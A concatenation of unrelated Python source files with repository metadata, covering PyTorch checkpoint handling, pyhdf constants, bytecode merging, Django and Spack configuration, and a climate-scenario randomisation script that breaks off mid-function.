        devices = os.environ.get('CUDA_VISIBLE_DEVICES')
        self.n_gpus = 0 if self.device == 'cpu' else 1 if self.device.startswith('cuda:') else len(devices.split(','))
        can_parallel = self.n_gpus > 1
        self.setdefault(distributed=can_parallel) # use distributeddataparallel
        self.setdefault(parallel=can_parallel and not self.distributed) # use dataparallel
        self.local_rank = 0
        self.world_size = 1 # number of processes
        if self.distributed:
            self.local_rank = int(os.environ['LOCAL_RANK']) # rank of the current process
            self.world_size = int(os.environ['WORLD_SIZE'])
            assert self.world_size == self.n_gpus
            torch.cuda.set_device(self.local_rank)
            torch.distributed.init_process_group(backend='nccl', init_method='env://')
        self.main = self.local_rank == 0
        net.to(self.device)
        if train and self.opt_level != 'O0':
            # configure mixed precision
            net, opt = amp.initialize(net, opt, opt_level=self.opt_level, loss_scale=self.get('loss_scale'))
        step = self.set_state(net, opt=opt, step=step)
        if self.distributed:
            import apex
            net = apex.parallel.DistributedDataParallel(net)
        elif self.parallel:
            net = nn.DataParallel(net)
        if train:
            net.train()
            return net, opt, step
        else:
            net.eval()
            return net, step
    @property
    def train_results(self):
        return self.res / 'train_results.csv'
    def load_train_results(self):
        if self.train_results.exists():
            return pd.read_csv(self.train_results, index_col=0)
        return None
    @main_only
    def save_train_results(self, results):
        results.to_csv(self.train_results, float_format='%.6g')
    @property
    def stopped_early(self):
        # Marker file: presence means a previous run stopped early.
        return self.res / 'stopped_early'
    @main_only
    def set_stopped_early(self):
        self.stopped_early.save_txt('')
    @property
    def training(self):
        # Marker file: presence means a training run is in progress.
        return self.res / 'is_training'
    @main_only
    def set_training(self, is_training):
        if is_training:
            self.training.save_txt('')
        else:
            self.training.rm()
    @property
    def models(self):
        return (self.res / 'models').mk()
    def model_save(self, step):
        return self.models / ('model-%s.pth' % step)
    def model_step(self, path):
        """Extract the integer step from a model path, or None if no match."""
        # NOTE(review): non-raw string with \d emits a SyntaxWarning on
        # Python 3.12+; prefer r'.+/model-(\d+)\.pth'.
        m = re.match('.+/model-(\d+)\.pth', path)
        if m:
            return int(m.groups()[0])
    @property
    def model_best(self):
        return self.models / 'best_model.pth'
    @main_only
    def link_model_best(self, model_save):
        self.model_best.rm().link(Path(model_save).rel(self.models))
    def get_saved_model_steps(self):
        _, save_paths = self.models.ls()
        if len(save_paths) == 0:
            return []
        return sorted([x for x in map(self.model_step, save_paths) if x is not None])
    @main_only
    def clean_models(self, keep=5):
        """Delete oldest checkpoints beyond *keep*, preserving best and latest."""
        model_steps = self.get_saved_model_steps()
        delete = len(model_steps) - keep
        keep_paths = [self.model_best._real, self.model_save(model_steps[-1])._real]
        for e in model_steps:
            if delete <= 0:
                break
            path = self.model_save(e)._real
            if path in keep_paths:
                continue
            path.rm()
            delete -= 1
            self.log('Removed model %s' % path.rel(self.res))
    def set_state(self, net, opt=None, step='max', path=None):
        """Restore net/opt/amp state from disk; returns the restored step (0 if none)."""
        state = self.load_state(step=step, path=path)
        if state is None:
            return 0
        if self.get('append_module_before_load'):
            state['net'] = dict(('module.' + k, v) for k, v in state['net'].items())
        net.load_state_dict(state['net'])
        if opt and 'opt' in state:
            opt.load_state_dict(state['opt'])
        if 'amp' in state and self.opt_level != 'O0':
            amp.load_state_dict(state['amp'])
        return state['step']
    @main_only
    def get_state(self, net, opt, step):
        """Snapshot net/opt (+amp, best-effort) state dicts, moved to CPU."""
        try:
            net_dict = net.module.state_dict()
        except AttributeError:
            net_dict = net.state_dict()
        state = dict(step=step, net=net_dict, opt=opt.state_dict())
        # NOTE(review): bare except silently ignores any amp failure,
        # including unexpected ones — consider narrowing.
        try:
            state['amp'] = amp.state_dict()
        except:
            pass
        return to_torch(state, device='cpu')
    def load_state(self, step='max', path=None):
        '''
        step: best, max, integer, None if path is specified
        path: None if step is specified
        '''
        if path is None:
            if step == 'best':
                path = self.model_best
            else:
                if step == 'max':
                    steps = self.get_saved_model_steps()
                    if len(steps) == 0:
                        return None
                    step = max(steps)
                path = self.model_save(step)
        save_path = Path(path)
        if save_path.exists():
            return to_torch(torch.load(save_path), device=self.device)
        return None
    @main_only
    def save_state(self, step, state, clean=True, link_best=False):
        """Write a checkpoint, optionally pruning old ones and linking best."""
        save_path = self.model_save(step)
        torch.save(state, save_path)
        self.log('Saved model %s at step %s' % (save_path, step))
        if clean and self.get('max_save'):
            self.clean_models(keep=self.max_save)
        if link_best:
            self.link_model_best(save_path)
            self.log('Linked %s to new saved model %s' % (self.model_best, save_path))
        return save_path
import enlighten
progress_manager = enlighten.get_manager()
active_counters = []
class Progress(object):
    """Thin wrapper around an enlighten counter.

    Keeps every open counter in the module-level active_counters list and
    stops the shared manager once the last one is closed. Usable as a
    context manager; subclasses provide the iteration behavior.
    """

    def __init__(self, total, desc='', leave=False):
        self.counter = progress_manager.counter(total=total, desc=desc, leave=leave)
        active_counters.append(self.counter)

    def __enter__(self):
        return self

    def __exit__(self, exception_type, exception_value, traceback):
        self.close()

    def __iter__(self):
        return self

    def __next__(self):
        # Subclasses define how the bar advances.
        raise NotImplementedError()

    def close(self):
        """Close this bar; stop the shared manager when none remain."""
        self.counter.close()
        try:
            active_counters.remove(self.counter)
        except ValueError:
            pass  # already removed
        if not active_counters:
            progress_manager.stop()
class RangeProgress(Progress):
    """Progress bar that iterates like range(start, end, step)."""

    def __init__(self, start, end, step=1, desc='', leave=False):
        self.i = start
        self.start = start
        self.end = end
        self.step = step
        total = (end - start) // step
        super(RangeProgress, self).__init__(total, desc=desc, leave=leave)

    def __next__(self):
        # The bar ticks one step behind: nothing to show before the first yield.
        if self.i != self.start:
            self.counter.update()
        if self.i == self.end:
            self.close()
            raise StopIteration()
        current = self.i
        self.i += self.step
        return current
### Paths ###
# Standard project directory layout, anchored at this file's directory.
Proj = Path(__file__)._up
Cache = Proj / 'cache'
Distiller = Proj / 'distiller'
Data = Proj / 'data'
Res = (Proj / 'results').mk() | 30.661017 | 165 | 0.579878 |
7cf24248d26ab3dd670c2a949c5aad3bc3397782 | 1,927 | py | Python | HDF4_H5_NETCDF/source2.7/pyhdf/HC.py | Con-Mi/lambda-packs | b23a8464abdd88050b83310e1d0e99c54dac28ab | [
"MIT"
] | null | null | null | HDF4_H5_NETCDF/source2.7/pyhdf/HC.py | Con-Mi/lambda-packs | b23a8464abdd88050b83310e1d0e99c54dac28ab | [
"MIT"
] | null | null | null | HDF4_H5_NETCDF/source2.7/pyhdf/HC.py | Con-Mi/lambda-packs | b23a8464abdd88050b83310e1d0e99c54dac28ab | [
"MIT"
] | null | null | null | # $Id: HC.py,v 1.2 2005-07-14 01:36:41 gosselin_a Exp $
# $Log: not supported by cvs2svn $
# Revision 1.1 2004/08/02 15:36:04 gosselin
# Initial revision
#
from . import hdfext as _C
class HC(object):
    """The HC class holds constants defining opening modes and data types.
    File opening modes (flags ORed together)
    CREATE 4 create file if it does not exist
    READ 1 read-only mode
    TRUNC 256 truncate if it exists
    WRITE 2 read-write mode
    Data types
    CHAR 4 8-bit char
    CHAR8 4 8-bit char
    UCHAR 3 unsigned 8-bit integer (0 to 255)
    UCHAR8 3 unsigned 8-bit integer (0 to 255)
    INT8 20 signed 8-bit integer (-128 to 127)
    UINT8 21 unsigned 8-bit integer (0 to 255)
    INT16 23 signed 16-bit integer
    UINT16 23 unsigned 16-bit integer
    INT32 24 signed 32-bit integer
    UINT32 25 unsigned 32-bit integer
    FLOAT32 5 32-bit floating point
    FLOAT64 6 64-bit floating point
    Tags
    DFTAG_NDG 720 dataset
    DFTAG_VH 1962 vdata
    DFTAG_VG 1965 vgroup
    """
    # File opening modes (values come from the C extension, except TRUNC).
    CREATE = _C.DFACC_CREATE
    READ = _C.DFACC_READ
    TRUNC = 0x100 # specific to pyhdf
    WRITE = _C.DFACC_WRITE
    # Data type codes mirrored from the HDF C library.
    # NOTE(review): the docstring lists 23 for both INT16 and UINT16;
    # DFNT_INT16 is conventionally 22 — verify against hdfext.
    CHAR = _C.DFNT_CHAR8
    CHAR8 = _C.DFNT_CHAR8
    UCHAR = _C.DFNT_UCHAR8
    UCHAR8 = _C.DFNT_UCHAR8
    INT8 = _C.DFNT_INT8
    UINT8 = _C.DFNT_UINT8
    INT16 = _C.DFNT_INT16
    UINT16 = _C.DFNT_UINT16
    INT32 = _C.DFNT_INT32
    UINT32 = _C.DFNT_UINT32
    FLOAT32 = _C.DFNT_FLOAT32
    FLOAT64 = _C.DFNT_FLOAT64
    # Vdata interlace modes.
    FULL_INTERLACE = 0
    NO_INTERLACE =1
    # NOTE:
    # INT64 and UINT64 are not yet supported by pyhdf
    # HDF object tags.
    DFTAG_NDG = _C.DFTAG_NDG
    DFTAG_VH = _C.DFTAG_VH
    DFTAG_VG = _C.DFTAG_VG
| 26.763889 | 73 | 0.582771 |
a6c747d6e67eb75ec6145962ef028a77a3a608b2 | 159 | py | Python | utils/config.py | aguirrejuan/hipposeg | 1059feb677a8fa6f9903d18df1753eaf3be68d7c | [
"MIT"
] | null | null | null | utils/config.py | aguirrejuan/hipposeg | 1059feb677a8fa6f9903d18df1753eaf3be68d7c | [
"MIT"
] | null | null | null | utils/config.py | aguirrejuan/hipposeg | 1059feb677a8fa6f9903d18df1753eaf3be68d7c | [
"MIT"
] | null | null | null | from easydict import EasyDict as edict
__C = edict()
# from config import cfg
cfg = __C
__C.CROP = 160 | 19.875 | 39 | 0.477987 |
198bd56f96a9d7633bdd5f88ba8276c4b4c9dafc | 3,497 | py | Python | code_utils.py | martmists/mixin | bf1bbd71ddfa189f6ea552a0f07d7caa723a219d | [
"MIT"
] | 1 | 2020-08-04T12:26:33.000Z | 2020-08-04T12:26:33.000Z | code_utils.py | martmists/mixin | bf1bbd71ddfa189f6ea552a0f07d7caa723a219d | [
"MIT"
] | null | null | null | code_utils.py | martmists/mixin | bf1bbd71ddfa189f6ea552a0f07d7caa723a219d | [
"MIT"
] | null | null | null | import dis
import struct
from types import CodeType
from typing import Tuple
def new_code(fc, *, argcount=None, posonlyargcount=None, kwonlyargcount=None, nlocals=None, stacksize=None, flags=None,
             code_=None, consts=None, names=None, varnames=None, filename=None, name=None, firstlineno=None,
             lnotab=None, freevars=None, cellvars=None):
    """Return a copy of code object *fc* with the given fields replaced.

    Only arguments that are not None override the original; the previous
    `x or fc.co_x` pattern silently ignored falsy overrides such as
    argcount=0, consts=() or name=''. Delegating to CodeType.replace() also
    keeps this working across CPython versions where the CodeType
    constructor signature changed (3.11 added qualname/exceptiontable).
    `lnotab` is forwarded as co_lnotab and is only accepted by interpreters
    that still support it (< 3.10).
    """
    overrides = {
        'co_argcount': argcount,
        'co_posonlyargcount': posonlyargcount,
        'co_kwonlyargcount': kwonlyargcount,
        'co_nlocals': nlocals,
        'co_stacksize': stacksize,
        'co_flags': flags,
        'co_code': code_,
        'co_consts': consts,
        'co_names': names,
        'co_varnames': varnames,
        'co_filename': filename,
        'co_name': name,
        'co_firstlineno': firstlineno,
        'co_lnotab': lnotab,
        'co_freevars': freevars,
        'co_cellvars': cellvars,
    }
    return fc.replace(**{field: value for field, value in overrides.items() if value is not None})
def new_instruction(instr, *, opname=None, opcode=None, arg=None, argval=None, argrepr=None, offset=None, starts_line=None, is_jump_target=None):
    """Return a copy of dis.Instruction *instr* with the given fields replaced.

    dis.Instruction is a namedtuple, so _replace() builds the copy. Only
    non-None arguments override; the previous `x or instr.x` pattern could
    not set falsy values (e.g. arg=0 or is_jump_target=False), and the
    positional Instruction(...) construction broke on CPython versions that
    append extra fields (e.g. `positions` in 3.11).
    """
    overrides = {
        'opname': opname,
        'opcode': opcode,
        'arg': arg,
        'argval': argval,
        'argrepr': argrepr,
        'offset': offset,
        'starts_line': starts_line,
        'is_jump_target': is_jump_target,
    }
    return instr._replace(**{field: value for field, value in overrides.items() if value is not None})
def merge_code(original: CodeType, added: CodeType) -> Tuple[CodeType, bytes]:
    # Merges consts, varnames and names (though names probably isn't useful here)
    # It also takes the max stack size of the two and increases it by 1 to be safe.
    # Returns (merged code object, raw bytecode of `added` remapped to the
    # merged const/name/varname tables). Existing entries are reused by
    # value; new ones are appended and indexed at the end.
    # NOTE(review): struct.pack("BB", ...) below assumes every remapped arg
    # fits in one byte; instructions that would need EXTENDED_ARG
    # (arg > 255) raise struct.error — TODO handle if tables grow large.
    all_consts = list(original.co_consts)
    all_varnames = list(original.co_varnames)
    all_names = list(original.co_names)
    remapped_instructions = []
    for instruction in dis.get_instructions(added):
        if instruction.opcode in dis.hasconst:
            # Constant operand: remap its index into the merged consts table.
            if instruction.argval in all_consts:
                instruction = new_instruction(instruction, arg=all_consts.index(instruction.argval))
            else:
                instruction = new_instruction(instruction, arg=len(all_consts))
                all_consts.append(instruction.argval)
        elif instruction.opcode in dis.haslocal:
            # Local-variable operand: remap into the merged varnames table.
            if instruction.argval in all_varnames:
                instruction = new_instruction(instruction, arg=all_varnames.index(instruction.argval))
            else:
                instruction = new_instruction(instruction, arg=len(all_varnames))
                all_varnames.append(instruction.argval)
        elif instruction.opcode in dis.hasname:
            # Global/attribute name operand: remap into the merged names table.
            if instruction.argval in all_names:
                instruction = new_instruction(instruction, arg=all_names.index(instruction.argval))
            else:
                instruction = new_instruction(instruction, arg=len(all_names))
                all_names.append(instruction.argval)
        remapped_instructions.append(instruction)
    return (new_code(original,
                     consts=tuple(all_consts),
                     names=tuple(all_names),
                     varnames=tuple(all_varnames),
                     stacksize=max([original.co_stacksize, added.co_stacksize])+1),
            b"".join(struct.pack("BB", b.opcode, b.arg or 0) for b in remapped_instructions))
b1122022dbc3f2e09b0549845101c4fe00068afb | 408 | py | Python | tog_project_log/tog_project_log/wsgi.py | Tog-Hackerspace/Project-Log | 7bf89e3ee437fa5021287a8f08471bf27ed6ad4f | [
"MIT"
] | null | null | null | tog_project_log/tog_project_log/wsgi.py | Tog-Hackerspace/Project-Log | 7bf89e3ee437fa5021287a8f08471bf27ed6ad4f | [
"MIT"
] | 9 | 2016-09-27T10:24:29.000Z | 2016-10-04T16:23:56.000Z | tog_project_log/tog_project_log/wsgi.py | Tog-Hackerspace/Project-Log | 7bf89e3ee437fa5021287a8f08471bf27ed6ad4f | [
"MIT"
] | null | null | null | """
WSGI config for tog_project_log project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Default to this project's settings module; honored only when the variable
# is not already set in the environment.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tog_project_log.settings")
# WSGI entry point referenced by application servers (gunicorn, uwsgi, ...).
application = get_wsgi_application()
| 24 | 78 | 0.794118 |
e866245794f4b93fca9a017ac268c489f0dade71 | 1,194 | py | Python | var/spack/repos/builtin/packages/py-testinfra/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 2 | 2018-11-27T03:39:44.000Z | 2021-09-06T15:50:35.000Z | var/spack/repos/builtin/packages/py-testinfra/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-01-11T20:11:52.000Z | 2019-01-11T20:11:52.000Z | var/spack/repos/builtin/packages/py-testinfra/package.py | HaochengLIU/spack | 26e51ff1705a4d6234e2a0cf734f93f7f95df5cb | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-10-14T14:20:17.000Z | 2020-10-14T14:20:17.000Z | # Copyright 2013-2018 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyTestinfra(PythonPackage):
    """With Testinfra you can write unit tests in Python to test actual state
    of your servers configured by management tools like Salt, Ansible, Puppet,
    Chef and so on."""
    homepage = "https://testinfra.readthedocs.io"
    url = "https://pypi.python.org/packages/source/t/testinfra/testinfra-1.11.1.tar.gz"
    # Release tarballs registered with Spack (second argument is the md5 checksum).
    version('1.13.0', '1e0a135c784207f8609e7730901f1291')
    version('1.12.0', '9784c01d7af3d624c6ec3cd25cce2011')
    version('1.11.1', 'c64ce6b16661d647c62c9508de419f5f')
    depends_on('py-setuptools', type='build')
    # importlib backport is only needed on Python 2.6.
    depends_on('py-importlib', when='^python@2.6.0:2.6.999', type=('build', 'run'))
    depends_on('py-pytest@:3.0.1,3.0.3:', type=('build', 'run'))
    depends_on('py-six@1.4:', type=('build', 'run'))
    # Required for testing remote systems
    depends_on('py-paramiko', type=('build', 'run'))
    # Required for parallel execution
    depends_on('py-pytest-xdist', type=('build', 'run'))
| 38.516129 | 92 | 0.693467 |
82b4ced807fd9ed4300cc5587015641557a9cce9 | 3,537 | py | Python | lookbook/lookbook/settings.py | bdizon/instagram-lookbook | 659e378c513dfc070085c7543532f345076097d0 | [
"MIT"
] | null | null | null | lookbook/lookbook/settings.py | bdizon/instagram-lookbook | 659e378c513dfc070085c7543532f345076097d0 | [
"MIT"
] | null | null | null | lookbook/lookbook/settings.py | bdizon/instagram-lookbook | 659e378c513dfc070085c7543532f345076097d0 | [
"MIT"
] | null | null | null | """
Django settings for lookbook project.
Generated by 'django-admin startproject' using Django 3.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control; rotate it and load
# it from the environment before any production deployment.
SECRET_KEY = '0d34)ds!bs#8lm8*pmfam4y27%n#sz88cj@7^f911$b^t51&73'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'api.apps.ApiConfig',
    'rest_framework',
    'frontend.apps.FrontendConfig',
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'lookbook.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'lookbook.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# NOTE(review): database credentials are hard-coded below; prefer loading
# USER/PASSWORD from environment variables.
DATABASES = {
    # 'default': {
    # 'ENGINE': 'django.db.backends.sqlite3',
    # 'NAME': BASE_DIR / 'db.sqlite3',
    # }
    'default': {
        'ENGINE': 'django.db.backends.postgresql_psycopg2',
        'NAME': 'lookbookdb',
        'USER': 'postgres',
        'PASSWORD': 'password',
        'HOST': '127.0.0.1',
        'PORT': '5432',
    }
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
f64469fca59af06270ec5adb7a0c9f8f0f54df6e | 15,743 | py | Python | tmp_pcp_Generator.py | saeedashraf/snow-ski-resort-finance | 0ee1d0336b417e9c26b2166de198e8452ee02c71 | [
"MIT"
] | null | null | null | tmp_pcp_Generator.py | saeedashraf/snow-ski-resort-finance | 0ee1d0336b417e9c26b2166de198e8452ee02c71 | [
"MIT"
] | 11 | 2021-02-09T11:30:32.000Z | 2022-03-12T00:46:35.000Z | tmp_pcp_Generator.py | saeedashraf/Snow-Ski-Resort-DMDU | 0ee1d0336b417e9c26b2166de198e8452ee02c71 | [
"MIT"
] | 1 | 2020-05-26T09:02:08.000Z | 2020-05-26T09:02:08.000Z | import os
import os.path
import random
from operator import add
from datetime import datetime, date, timedelta
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
import shutil
# Step 1: Setting Up Climate Scenarios (CH2018, and Random Scenarios)
def is_leap(year):
    """Return True for Gregorian leap years, False otherwise."""
    if year % 4 != 0:
        return False
    if year % 100 != 0:
        return True
    return year % 400 == 0
def chunks(lst, n):
    """Yield consecutive slices of *lst* of length n (the last may be shorter)."""
    for offset in range(0, len(lst), n):
        yield lst[offset:offset + n]
## S1.1. Function that pruduces new climate (precipitation) realization
def random_pcp(dfpcp, FirstYear, LastYear, ScenarioNumbers, RCPNames, Xfactor1):
#outFileName = OutFileName
dfpcpCol = dfpcp.columns
#sceNum = len(dfCol)
sceNum = ScenarioNumbers
firstYear = FirstYear
lastYear = LastYear
simLen = lastYear - firstYear + 1
from random import shuffle
#a = []
#for x in range(simLen):
#randomInd = [z for z in range(sceNum)]
#shuffle(randomInd)
#a.append(randomInd)
a = []
for i in range(simLen):
randomInd = [z for z in range(sceNum)]
#x = [[i] for i in range(10)]
for x in range(int(round(Xfactor1))):
shuffle(randomInd)
a.append(randomInd)
RCP = RCPNames
columnsDfpcp = ['sc_' + RCP + str(k) for k in range(1, sceNum+1,1)]
c = [[19810101 for p in range(sceNum)]]
#df1 = 'df' + str(outDFNumber)
df1pcp = pd.DataFrame(c, columns =columnsDfpcp)
#df1.to_csv('SAeidVaghefimodified1111222.csv', index = False)
c.clear()
i = 0
p = 1
for m in range(firstYear, lastYear + 1, 1):
if is_leap(m):
for j in range(((m - firstYear)*365+p) , ((m - firstYear)*365+367+p-1), 1):
c.append(dfpcp[dfpcpCol[a[i]]].iloc[j].values)
i += 1 # counter i; equal to simulation length (simLen)
p += 1
else:
for j in range(((m - firstYear)*365+p), ((m - firstYear)*365+366+p-1), 1):
c.append(dfpcp[dfpcpCol[a[i]]].iloc[j].values)
i += 1
#print(m) # this line show the progress of the work by typing the years of simulation
dfnewpcp = 'df' + str(m)
dfnewpcp = pd.DataFrame(c, columns =columnsDfpcp)
c.clear()
df1pcp = df1pcp.append(dfnewpcp, ignore_index=True)
return df1pcp
## S1.2. Function that pruduces new climate (temperature) realization
def random_tmp(dftmp, FirstYear, LastYear, ScenarioNumbers, RCPNames, Xfactor1):
    """Build a new temperature realization by reshuffling scenario columns.

    `dftmp` interleaves Tmax/Tmin columns (even indices = max, odd = min).
    Like random_pcp, one random column permutation per simulated year is
    drawn, daily Tmax/Tmin rows are copied in that order, and the output
    re-interleaves them as [max, min] pairs under columns
    ['sc_<RCPNames><k>', ''] per scenario.

    NOTE(review): unlike random_pcp, `p` is initialized but never
    incremented here, so the leap-day row offset into the source frame is
    never applied — verify whether `p += 1` is missing for leap years.
    NOTE(review): `i` advances once per DAY while `a` has one entry per
    YEAR (simLen), so a[i] appears to overrun — confirm intended
    indentation of the `i += 1` lines.
    NOTE(review): DataFrame.append was removed in pandas 2.0; this needs
    pd.concat([df1tmp, dfnewtmp], ignore_index=True) there.
    """
    #dfCol = df.columns
    #sceNum = len(dfCol) // 2
    sceNum = ScenarioNumbers
    firstYear = FirstYear
    lastYear = LastYear
    simLen = lastYear - firstYear + 1
    dftmpColMax = dftmp.columns[[i for i in range(0, sceNum*2, 2)]]
    dftmpColMin = dftmp.columns[[i for i in range(1, sceNum*2, 2)]]
    ## a list of length simLen (years), each entry holding a random ordering of the scenario indices
    from random import shuffle
    #a = []
    #for i in range(simLen):
    #randomInd = [j for j in range(sceNum)]
    #x = [[i] for i in range(10)]
    #shuffle(randomInd)
    #a.append(randomInd)
    a = []
    for i in range(simLen):
        randomInd = [j for j in range(sceNum)]
        #x = [[i] for i in range(10)]
        for x in range(int(round(Xfactor1))):
            shuffle(randomInd)
        a.append(randomInd)
    #print('end!')
    cT = []
    RCP = RCPNames
    columnsDfOdd = ['sc_' + RCP + str(k) for k in range(1, sceNum+1,1)]
    columnsDfEven = [""] * sceNum
    columnsDftmp = []
    #colOdd = ['Scr_' + str(i) for i in range(1, sceNum+1, 1)]
    #colEven = ['' for i in range(1, sceNum+1,1)]
    for i in range (sceNum):
        columnsDftmp.append(columnsDfOdd[i])
        columnsDftmp.append(columnsDfEven[i])
    #### OR:
    #columnsDf = ["Sr", ""] * sceNum
    df1tmp = pd.DataFrame(cT, columns =columnsDftmp)
    #df1.to_csv("rrrrrrrrmodified1111222.csv", index = False)
    # Header rows: sentinel date for the max series, blank for the min series.
    cMax = [[19810101 for p in range(sceNum)]]
    cMin = [["" for p in range(sceNum)]]
    i = 0
    p = 1
    for m in range(firstYear, lastYear + 1, 1):
        if is_leap(m):
            for j in range(((m - firstYear)*365+p) , ((m - firstYear)*365+367+p-1), 1):
                cMax.append(dftmp[dftmpColMax[a[i]]].iloc[j].values)
                cMin.append(dftmp[dftmpColMin[a[i]]].iloc[j].values)
                i += 1
        else:
            for j in range(((m - firstYear)*365+p), ((m - firstYear)*365+366+p-1), 1):
                cMax.append(dftmp[dftmpColMax[a[i]]].iloc[j].values)
                cMin.append(dftmp[dftmpColMin[a[i]]].iloc[j].values)
                i += 1
        # Interleave max/min values per day into a flat list, then regroup
        # into rows of 2*sceNum values.
        c = []
        for y in range(0, len(cMax), 1): # the length of simulation years
            for z in range(sceNum): # range(4)
                c.append(cMax[y][z])
                c.append(cMin[y][z])
        cMax.clear()
        cMin.clear()
        cMain = []
        cMain = list(chunks(c, sceNum * 2))
        #print(m) # this line show the progress of the work by typing the years of simulation
        ### Should be checked
        dfnewtmp = 'dftmp' + str(m)
        #columnsDf = ["Sr", ""]*sceNum
        #columnsDf = [['sc_' + str(k), ""] for k in range(1, sceNum+1,1)]
        dfnewtmp = pd.DataFrame(cMain, columns =columnsDftmp)
        c.clear()
        df1tmp = df1tmp.append(dfnewtmp, ignore_index=True)
    return df1tmp
## S1.3. Function that calls the random_pcp and random_tmp for all stations of a Ski resort
def randomness_pcp_tmp(fnames, Xfactor1):
    """Apply scenario randomisation to every station file in ``fnames``.

    Precipitation files (name containing 'p.csv') are split into their
    RCP26/RCP45/RCP85 column groups and passed through ``random_pcp``;
    temperature files ('t.csv') are split the same way and passed through
    ``random_tmp``.  Results are written back over the original files in the
    current working directory.

    fnames   -- iterable of file names in the current directory
    Xfactor1 -- shuffle-pass count forwarded to random_pcp / random_tmp
    NOTE(review): the scenario counts (12/25/31) and year range (1981-2099)
    are hard-coded -- confirm they match every input file.
    """
    for f in fnames:
        if 'p.csv' in f:
            print('Writing pcp files started!')
            #df = pd.read_csv('47-0625000_8-6666667p.csv')
            dfpcp = pd.read_csv(f)
            # Boolean masks selecting the columns belonging to each RCP.
            filt1 = dfpcp.columns.str.contains('RCP26|_26_') #12
            filt2 = dfpcp.columns.str.contains('RCP45|_45_') #25
            filt3 = dfpcp.columns.str.contains('RCP85|_85_') #31
            dfpcpRCP26 = dfpcp.loc[:, filt1]
            dfpcpRCP45 = dfpcp.loc[:, filt2]
            dfpcpRCP85 = dfpcp.loc[:, filt3]
            dfpcpRCP26_n = random_pcp(dfpcpRCP26, 1981, 2099, 12, '26_', Xfactor1)
            dfpcpRCP45_n = random_pcp(dfpcpRCP45, 1981, 2099, 25, '45_', Xfactor1)
            dfpcpRCP85_n = random_pcp(dfpcpRCP85, 1981, 2099, 31, '85_', Xfactor1)
            result = pd.concat([dfpcpRCP26_n, dfpcpRCP45_n, dfpcpRCP85_n], axis=1, sort=False)
            #result.to_csv('47-0625000_8-6666667p_n1.csv', index = False)
            #newName = 'n_'+ f
            newName = f
            #filepath = os.path.join(os.getcwd(), newName)
            root = os.getcwd()
            '''This part makes a new dir for outouts''' ## should be cooment out later
            #if os.path.isdir(os.path.join(root, 'Outputs_randomness')):
                #pass
            #else: os.mkdir(os.path.join(root, 'Outputs_randomness'))
            #outfolder = os.path.join(os.getcwd(), 'Outputs_randomness')
            outfolder =os.path.join(os.getcwd()) # we want the results to be over written
            filepath = os.path.join(outfolder, newName)
            result.to_csv(filepath, index = False)
            print('End of writing pcp files!')
            #print("--- %s seconds ---" % (time.time() - start_time))
        elif 't.csv' in f:
            print('Writing tmp files started!')
            dftmp = pd.read_csv(f)
            dftmpCol = list(dftmp.columns)
            # Column positions of the max-temperature series for each RCP; the
            # matching min-temperature column sits immediately to the right.
            filt1_max = [dftmpCol.index(s) for s in dftmpCol if ("_26_") in s or ("RCP26") in s]
            filt2_max = [dftmpCol.index(s) for s in dftmpCol if ("_45_") in s or ("RCP45") in s]
            filt3_max = [dftmpCol.index(s) for s in dftmpCol if ("_85_") in s or ("RCP85") in s]
            aOnefilt1= [1]*len(filt1_max)
            aOnefilt2= [1]*len(filt2_max)
            aOnefilt3= [1]*len(filt3_max)
            # Shift every max-column index by one to get the min-column index
            # (``add`` is operator.add, imported at module level).
